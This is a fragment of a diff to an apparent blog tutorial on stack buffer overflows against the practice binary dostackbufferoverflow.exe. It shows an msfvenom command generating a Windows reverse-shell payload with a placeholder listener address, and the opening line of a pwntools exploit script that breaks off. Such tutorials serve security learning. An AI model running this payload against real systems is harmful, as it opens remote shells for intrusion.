an0th3rhuman/an0th3rhuman.github.io/_posts/2020-02-05-Buffer-overflow-easy-steps!.md

 `msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -f c -a x86 -b "\x00\x0A"`

-So our final python program look like this
+So our final python program look like this for the binary dostackbufferoverflow.exe

 ```python
 from pwn import *